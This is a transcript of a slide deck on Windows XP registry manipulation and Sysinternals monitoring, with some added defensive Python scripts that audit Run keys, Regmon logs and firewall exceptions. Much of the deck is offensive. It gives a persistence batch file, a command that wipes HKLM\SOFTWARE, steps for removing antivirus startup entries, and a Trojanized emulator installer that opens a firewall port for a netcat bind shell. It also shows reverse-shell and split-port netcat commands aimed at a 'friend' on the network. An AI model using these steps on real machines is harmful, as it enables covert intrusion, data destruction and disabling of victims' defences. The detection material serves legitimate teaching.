System Monitoring with Sys-Internals
http://www.sys-internals.com

Jan 27, 2016


sinjin

System Monitoring with Sys-Internals. http://www.sys-internals.com. Section 1: Registry Manipulation and Having Evil fun. Registry - Part of windows containing program info. - System settings stored in registry - Replaced old startup systems (Autoexec.bat, ini files) - PowerPoint PPT Presentation
Transcript
Page 1: System Monitoring with Sys-Internals

System Monitoring with Sys-Internals

http://www.sys-internals.com

Page 2: System Monitoring with Sys-Internals

Section 1: Registry Manipulation and Having Evil Fun

Registry

- Part of Windows containing program info
- System settings stored in registry
- Replaced old startup systems (Autoexec.bat, ini files)
- Essential to Windows operation

Structure

- registry divided into hives
- like a folder hierarchy
- keys located in lower levels of hives

Page 3: System Monitoring with Sys-Internals

Parts of the Registry

HKEY_CURRENT_USER
- information and profile of current user

HKEY_USERS
- user profiles

HKEY_LOCAL_MACHINE
- configuration information particular to the computer

HKEY_CLASSES_ROOT
- subclass of LOCAL_MACHINE: stores program information

HKEY_CURRENT_CONFIG
- hardware profiles

Page 4: System Monitoring with Sys-Internals

Software

Regedit
- Built into Windows
- GUI registry modifier

Regmon
- Sysinternals tool that monitors all registry accesses and activities
- Has filtering capabilities
- Will be used to detect malicious keys and their function

Batch Files
- Can combine commands into a simple program

Jetico Firewall
- For simple key demonstration

Page 5: System Monitoring with Sys-Internals

Structure of a Key

Name | Type | Data

Appears like this in Regedit

Page 6: System Monitoring with Sys-Internals

Modifying Keys

1) Adding a key:
   REG ADD RegistryPath /V Name /d Data

2) Modifying an existing key:
   REG UPDATE RegistryPath /V Name /d Data

3) Deleting a key:
   REG DELETE RegistryPath [/FORCE]

Page 7: System Monitoring with Sys-Internals

Lab Situation

Virus gets installed on a system.
User deletes the virus, but on restart the virus comes back.
One way a hacker can do this is via the registry.
The following key location contains startup program information:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Page 8: System Monitoring with Sys-Internals

Startup Program Examples

Page 9: System Monitoring with Sys-Internals

Re-installation

Batch File: Infect.bat
Infect.bat and virus on system in hidden folder.
Infect.bat copies virus to Windows, renames it to MrMalicious, and runs it.
User sees virus in task manager, searches hard drive and deletes MrMalicious, thinking he or she is da bomb.

Page 10: System Monitoring with Sys-Internals

Uh-Oh

Infect.bat re-infects the system on startup because of startup registry key.
Hidden viral file is still on system.
MrMalicious comes back.
User is not da bomb.

Note: MrMalicious for this lab just takes up CPU time and runs in the background.

Page 11: System Monitoring with Sys-Internals

Viral Code

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Process /d "C:\WINDOWS\HiddenFolder\Infect.bat"

MD "C:\WINDOWS\HiddenFolder\"
copy Infect.bat "C:\WINDOWS\HiddenFolder\"
copy RenameMe.exe "C:\WINDOWS\HiddenFolder\"
copy RenameMe.exe "C:\Windows\HiddenFolder\"
cd "C:\Windows"
Ren RenameMe.exe "MrMalicious.exe"
Start MrMalicious.exe
exit

Page 12: System Monitoring with Sys-Internals

Turning off Antivirus/Firewalls

Before going over detection, we will examine how to turn off important anti-viral programs.

Wouldn’t it be nice not to have to deal with a victim’s firewall?

Page 13: System Monitoring with Sys-Internals

Removal of Startup programs

Simple Process
1. Delete all startup keys manually on hacker system
2. Backup key folder by exporting
3. Have virus replace startup folder with empty backup.

Running registry backups (.reg) will replace keys in the current location.
Could also use query command in software to remove all keys with string “norton” or “zonealarm” in specified hive.

Page 14: System Monitoring with Sys-Internals

Detection

Regmon: GUI based registry logger
Lots of registry accesses/second on Windows system
Typical program install requires 150,000 registry accesses.
How can we find malicious keys with so many reads/writes to registry?

Page 15: System Monitoring with Sys-Internals

Regmon Filtering

Page 16: System Monitoring with Sys-Internals

Filtering Cont’d

User can filter out normal processes such as Explorer.exe, svchost, etc.
Logged entries can be cut down to just a few hundred.
Now easier to find where malicious keys have been added.
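Added example, not part of the slides: the filtering step above carried out in Python over a constructed Regmon-style log. It drops the noise processes the deck names and read-only requests, but always keeps a write under an autostart key whatever process issued it, since an exclusion on Explorer.exe would otherwise hide a Run-key write made in its name. The log rows, process names and PIDs are made up.

```python
from collections import namedtuple

# One Regmon row: sequence number, time, "process:pid", request type,
# registry path, result, and the "Other" column (value data, handle, ...).
Event = namedtuple("Event", "seq time process request path result other")

# Constructed Regmon-style log for this example (tab-separated, as Regmon
# exports it). Made up to mirror the deck's lab: reg.exe adds the Run value,
# installer.exe deletes a vendor autostart, and one write shows up under
# Explorer.EXE's name.
RAW_ROWS = [
    ("1", "10:31:02", "svchost.exe:1032", "QueryValue",
     r"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domain", "SUCCESS", '""'),
    ("2", "10:31:02", "Explorer.EXE:1544", "OpenKey",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer", "SUCCESS", "Key: 0xE1A2B3C4"),
    ("3", "10:31:03", "cmd.exe:2200", "OpenKey",
     r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SUCCESS", "Key: 0xE1A2B3D0"),
    ("4", "10:31:03", "reg.exe:2212", "SetValue",
     r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Process", "SUCCESS",
     r'"C:\WINDOWS\HiddenFolder\Infect.bat"'),
    ("5", "10:31:04", "MrMalicious.exe:2300", "QueryValue",
     r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs", "NOT FOUND", ""),
    ("6", "10:31:05", "Explorer.EXE:1544", "SetValue",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState", "SUCCESS", "..."),
    ("7", "10:31:06", "Explorer.EXE:1544", "SetValue",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\update", "SUCCESS",
     r'"c:\windows\system32\server.exe"'),
    ("8", "10:31:07", "installer.exe:2310", "DeleteValue",
     r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Norton AntiVirus", "SUCCESS", ""),
]
SAMPLE_LOG = "\n".join("\t".join(row) for row in RAW_ROWS)

WRITE_REQUESTS = {"SetValue", "CreateKey", "DeleteKey", "DeleteValue"}
# Processes the deck suggests filtering out (Explorer.exe, svchost, ...).
NOISE_PROCESSES = {"explorer.exe", "svchost.exe", "services.exe", "lsass.exe", "csrss.exe"}
# Prefix match covers Run, RunOnce, RunServices and RunServicesOnce.
AUTOSTART_PREFIXES = tuple(
    hive + r"\software\microsoft\windows\currentversion\run"
    for hive in ("hklm", "hkcu", "hkey_local_machine", "hkey_current_user"))


def parse_log(text):
    """Parse tab-separated Regmon rows; rows with fewer than six columns are skipped."""
    events = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) < 6:
            continue
        fields = (fields + [""])[:7]          # the "Other" column may be absent
        events.append(Event(*fields))
    return events


def proc_name(event):
    """'Explorer.EXE:1544' -> 'explorer.exe'."""
    return event.process.rsplit(":", 1)[0].lower()


def touches_autostart(event):
    return event.path.lower().startswith(AUTOSTART_PREFIXES)


def filter_events(events, noise=NOISE_PROCESSES, writes_only=True):
    """Apply the deck's process filter, with one exception: a write under an
    autostart key is kept even when its process is on the noise list."""
    kept = []
    for ev in events:
        is_write = ev.request in WRITE_REQUESTS
        if is_write and touches_autostart(ev):
            kept.append(ev)
            continue
        if proc_name(ev) in noise:
            continue
        if writes_only and not is_write:
            continue
        kept.append(ev)
    return kept


if __name__ == "__main__":
    for ev in filter_events(parse_log(SAMPLE_LOG)):
        print(ev.seq, ev.process, ev.request, ev.path, ev.other)
```

With the sample rows, the writes-only filter leaves three events (the Run-key add, the Run-key write under Explorer.EXE, and the Norton deletion) out of eight.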

Page 17: System Monitoring with Sys-Internals

Evil Fun Time: Disable OS

Registry is key to operation of Windows.
Unfortunately, can be easily modified to make Windows unstable and unbootable.
Easy way to make enemies.

Page 18: System Monitoring with Sys-Internals

Not fun for victim machine

“REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE /FORCE”

Page 19: System Monitoring with Sys-Internals

Recovery from Reg deletion

System not bootable even in safe mode after previous line of code is run!!!
In order to recover normal program operation, must have a backup copy of whole registry.
Without backup copy, all programs not included on Windows installation CD must be re-installed.
Advice: Start backing up your registry.
Erunt is software that can back up and re-insert the whole registry easily.
http://www.snapfiles.com/download/dlerunt.html

Page 20: System Monitoring with Sys-Internals

The Windows XP SP2 Firewall

Page 21: System Monitoring with Sys-Internals

Poking holes in the Firewall from the command line

netsh firewall show portopening

Page 22: System Monitoring with Sys-Internals

Poking holes in the Firewall from the command line cont.

What happens when we try to use Netcat to listen on a closed port?

Page 23: System Monitoring with Sys-Internals

Poking holes in the Firewall from the command line cont.

If set to not allow exceptions, reset the firewall to default: C:\netsh firewall reset
Firewall default allows exceptions.
After exceptions are allowed, add desired exception:
C:\netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL

Page 24: System Monitoring with Sys-Internals

Hypothetical Scenario

Let us pretend we are a hacker with not so pleasant intentions operating from a RedHat 7.2 machine. The Windows XP machine is being operated by either a co-worker, schoolmate, roommate, or anyone you can think of that would be found on the same network as you (i.e. no router is separating you).

Page 25: System Monitoring with Sys-Internals

Hypothetical Scenario cont.

Suppose we give our friend the Windows XP user a self extracting Zip program that installs the ZSNES Super Nintendo Emulator. Unfortunately for the Windows XP user, we have also made it so this self extracting zip installs netcat, and runs a C program we wrote named installer.exe.

Page 26: System Monitoring with Sys-Internals

Installer.c

Page 27: System Monitoring with Sys-Internals

How the 8633 Exploit works

9 system calls
The first system call moves an .exe called process to c:\Windows\system32
The second call executes process -k nc.exe; this process kills all instances of Netcat in case the exploit has already been run on this machine, so as not to cause an error.

Page 28: System Monitoring with Sys-Internals

How the 8633 Exploit works cont.

The third call moves nc.exe to C:\Windows\system32. nc.exe is Netcat!

The fourth call moves server.exe to C:\Windows\system32

The fifth call resets the Windows firewall in case it is set to not allow any exceptions: c:\netsh firewall reset

Page 29: System Monitoring with Sys-Internals

How the 8633 Exploit works cont.

The sixth system call is “C:\netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL”, which opens up the firewall on port 8633 for Netcat.

The seventh system call, “reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d c:\windows\system32\server.exe /f”, adds a key to the registry allowing server.exe to run whenever the computer is booted.

Page 30: System Monitoring with Sys-Internals

Changing the Registry to run a program when starting Windows

The Windows XP registry has six registry keys designated for launching programs when starting up the computer. They are:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- Launches program when specific user logs in

HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
- Launches program when specific user logs in next time, then is removed from the registry

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- Launches program automatically at system startup * (key modified by installer.c)

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
- Launches program automatically at system startup on next startup, then is removed from the registry.

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
- Launches service automatically at system startup (e.g. AIM)

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
- Launches service automatically at system startup on next startup, then is removed from the registry.
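Added example, not from the slides or the lab code: a Python audit of a .reg export of the six autostart keys listed above, the same kind of export the deck's "Backup key folder by exporting" step produces. It parses the REG_SZ values, separates a quoted executable path from its arguments, and flags entries that launch a script, sit in a folder with "hidden" in its name, or are bare file names resolved through PATH. That catches the lab's Infect.bat entry but not its server.exe entry, which is why the deck's live monitoring still matters. The .reg text is constructed; the SoundMAX and ctfmon values stand in for legitimate autostarts.

```python
import re

# Constructed .reg export for this example (not taken from the deck). The
# "Process" and "update" values copy what the lab's Infect.bat and
# installer.c add; the other two stand in for legitimate autostarts.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Process"="C:\\WINDOWS\\HiddenFolder\\Infect.bat"
"update"="c:\\windows\\system32\\server.exe"
"SoundMAX"="\"C:\\Program Files\\Analog Devices\\SoundMAX\\SMax4PNP.exe\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
'''

# The six autostart keys the slide lists, compared case-insensitively.
AUTOSTART_KEYS = {k.lower() for k in (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce",
)}

# A REG_SZ line: "name"="data", where data escapes \ and " with a backslash.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".js")


def unescape(s):
    """Undo .reg escaping of backslash and double quote."""
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg(text):
    """{key path: [(value name, data), ...]} for the REG_SZ values of an export.
    dword:/hex: values are ignored here; they cannot hold a command line."""
    entries, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            entries.setdefault(key, [])
        elif key is not None:
            m = VALUE_RE.match(line)
            if m:
                entries[key].append((unescape(m.group(1)), unescape(m.group(2))))
    return entries


def command_path(data):
    """Executable part of a command line: '"C:\\a b\\x.exe" /q' -> 'C:\\a b\\x.exe'."""
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def suspicious(data):
    """Reasons an autostart value deserves a look (heuristics, not proof)."""
    path = command_path(data).lower()
    reasons = []
    if path.endswith(SCRIPT_EXTENSIONS):
        reasons.append("launches a script")
    if "hidden" in path:
        reasons.append("path contains 'hidden'")
    if "\\" not in path:
        reasons.append("bare file name, resolved through PATH")
    return reasons


def audit_autostarts(text):
    """(key, value name, data, reasons) for every value under an autostart key."""
    findings = []
    for key, values in parse_reg(text).items():
        if key.lower() in AUTOSTART_KEYS:
            for name, data in values:
                findings.append((key, name, data, suspicious(data)))
    return findings


if __name__ == "__main__":
    for key, name, data, reasons in audit_autostarts(SAMPLE_REG):
        print(("!! " if reasons else "   ") + f"{key}\\{name} = {data}  {'; '.join(reasons)}")
```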

Page 31: System Monitoring with Sys-Internals

How the 8633 Exploit works cont.

The eighth system call runs Netcat. Because Netcat is run by the nc.exe executable, it is difficult to run so that the command prompt will close:
system("start /d \"c:\\windows\\system32\\\" nc -L -p 8633 -e cmd.exe -d");

The ninth system call is just an exit command needed to close a second instance of the cmd shell.

Page 32: System Monitoring with Sys-Internals

Server.c

Page 33: System Monitoring with Sys-Internals

What server.exe does and what Netcat is doing

Server.exe was added to the registry by installer.exe to run every time the system boots. Every time the system is restarted, Netcat runs listening on port 8633 and shells to cmd.exe when it is connected to by netcat from another machine.

Netcat is run with the -L and -d options so that it runs in silent mode, and opens itself back up in listening mode when disconnected.

C:\nc -L -p 8633 -e cmd.exe -d
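Added example, not from the slides: a Python check from the defender's side for the two artifacts the exploit leaves on the XP host, the "nc" exception that the netsh firewall add portopening command (page 23) creates and the listener on port 8633 that the command above starts. It parses constructed text approximating the output of netsh firewall show portopening and netstat -ano, and reports enabled exceptions that are not on an assumed baseline of expected services, together with the PID of any socket listening behind them.

```python
import re

# Constructed text approximating "netsh firewall show portopening" on XP SP2
# after the deck's add portopening command has run (made up for this example).
NETSH_OUTPUT = """\
Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
3389   TCP       Disable  Remote Desktop
8633   TCP       Enable   nc
8633   UDP       Enable   nc
"""

# Constructed text approximating "netstat -ano"; addresses and PIDs are made up.
NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       936
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8633           0.0.0.0:0              LISTENING       2316
  TCP    192.168.1.20:1045      192.168.1.5:80         ESTABLISHED     1544
  UDP    0.0.0.0:445            *:*                                    4
"""

# Exception names this host is expected to carry (assumed baseline for the example).
EXPECTED_EXCEPTIONS = {"netbios session service", "smb over tcp", "remote desktop"}

PROFILE_RE = re.compile(r"Port configuration for (\w+) profile")
EXCEPTION_RE = re.compile(r"^(\d+)\s+(TCP|UDP)\s+(Enable|Disable)\s+(.+?)\s*$")


def parse_portopenings(text):
    """{(port, proto): [(name, enabled, profile), ...]} from netsh output."""
    openings, profile = {}, None
    for line in text.splitlines():
        m = PROFILE_RE.search(line)
        if m:
            profile = m.group(1)
            continue
        m = EXCEPTION_RE.match(line.strip())
        if m:
            port, proto, mode, name = m.groups()
            openings.setdefault((int(port), proto), []).append(
                (name, mode == "Enable", profile))
    return openings


def parse_listeners(text):
    """{(port, proto): pid} for TCP sockets in LISTENING state and all UDP sockets."""
    listeners = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] not in ("TCP", "UDP"):
            continue
        proto, local, pid = fields[0], fields[1], fields[-1]
        if proto == "TCP" and "LISTENING" not in fields:
            continue
        port = int(local.rsplit(":", 1)[1])     # works for IPv4 and [::]:port
        listeners[(port, proto)] = int(pid)
    return listeners


def audit_exceptions(netsh_text, netstat_text, expected=EXPECTED_EXCEPTIONS):
    """Enabled exceptions outside the baseline: (port, proto, name, profile, pid).
    pid is None when nothing is listening behind the hole (yet)."""
    listeners = parse_listeners(netstat_text)
    findings = []
    for (port, proto), entries in sorted(parse_portopenings(netsh_text).items()):
        for name, enabled, profile in entries:
            if enabled and name.lower() not in expected:
                findings.append((port, proto, name, profile, listeners.get((port, proto))))
    return findings


if __name__ == "__main__":
    for port, proto, name, profile, pid in audit_exceptions(NETSH_OUTPUT, NETSTAT_OUTPUT):
        print(f"{proto} {port} '{name}' ({profile} profile) listener pid: {pid}")
```

On the sample data the only findings are the two "nc" exceptions on 8633, the TCP one with a live listener (PID 2316) that Process Explorer can then be pointed at.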

Page 34: System Monitoring with Sys-Internals

Files in the Zip file, and creating the self extractor

Page 35: System Monitoring with Sys-Internals

Going back to the Hypothetical scenario

Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly even a little Ogre Battle, the unsuspecting Windows XP user is more than happy to take and install the emulator you give him. After he installs it, you have administrative access to his machine, for as long as you are on the same network with him (assuming he is not extremely knowledgeable of his Registry, or Firewall, or doesn’t decide to format his hard drive).

Page 36: System Monitoring with Sys-Internals

How to access Our friend the Windows XP user’s computer

Since Netcat is listening on his computer whenever the computer is on, with the command C:\nc -L -p 8633 -e cmd.exe -d

All we have to do is run nc x.x.x.x 8633, where x.x.x.x is his IP address, and we have access.

Page 37: System Monitoring with Sys-Internals

Us having access

Page 38: System Monitoring with Sys-Internals

Why Port 8633

Because spelling out TODD numerically on cell phones etc. is done by 8-6-3-3.

TODD is my name, and I came up with this particular exploit, and I had to pick a port, so why not 8633.

Page 39: System Monitoring with Sys-Internals

A new Scenario

Suppose we want to gain access to our friend the Windows XP user’s computer (who by the way is probably not our friend, otherwise we wouldn’t be continuously hacking his computer), and this time he is not on the same network as we are.

Page 40: System Monitoring with Sys-Internals

A new Scenario cont.

In order to do this, we will edit our code slightly from the previous exploit. Rather than having the Windows user in listening mode, we will put our Linux machine in listen mode and have his machine seek out a connection with us. In both server.c and installer.c we will change

“c:\nc -L -p 8633 -e cmd.exe -d” to

“c:\nc “our_i.p.” 80 -e cmd.exe -d”

Page 41: System Monitoring with Sys-Internals

A new Scenario cont.

Make sure our router is set to forward the traffic coming into port 80 to our machine.

Then we initialize our machine in listen mode, with the command:

#nc -vv -l -p 80

Then we wait

Page 42: System Monitoring with Sys-Internals

Finally The waiting pays off

Page 43: System Monitoring with Sys-Internals

One final example

Running commands from one port and receiving on another

We can use Netcat to send commands through the cmd.exe shell, taking commands in from one port and sending them out another.

Page 44: System Monitoring with Sys-Internals

One final example cont.

Setting up two listening ports on your machine:

nc -vv -l -p 80
nc -vv -l -p 25

Then on the Windows machine run “nc x.x.x.x 80 | cmd.exe | nc x.x.x.x 25” where x.x.x.x is your IP address.

This allows you to run commands from port 80 and receive the results from port 25.

Page 45: System Monitoring with Sys-Internals

One final example cont.

Page 46: System Monitoring with Sys-Internals

Section 4: Unleashing a Wild Boar

Active Monitoring Tools
– Process Explorer

Activity Logging
– Registry Monitoring
– File Monitoring
– Network Monitoring

Stack Call
Logging Traffic

Page 47: System Monitoring with Sys-Internals

Process Explorer

Process Explorer
– Show CPU/Memory usage
– Show active network ports
– Show process threads

Page 48: System Monitoring with Sys-Internals

Process Explorer

Page 49: System Monitoring with Sys-Internals

Ethereal

Logs network traffic
– Become familiar with extracting TCP flows

Page 50: System Monitoring with Sys-Internals

Ethereal

Page 51: System Monitoring with Sys-Internals

Ethereal

Page 52: System Monitoring with Sys-Internals

Registry/File Monitoring

The File Monitoring Utility is a clone of the Registry Monitoring Utility.
– What can you see?

Process Name
Opens & Closes
Reads & Writes
Attempts & Failures

Page 53: System Monitoring with Sys-Internals

File Monitoring

Page 54: System Monitoring with Sys-Internals

Network Stack Monitoring

Page 55: System Monitoring with Sys-Internals

The End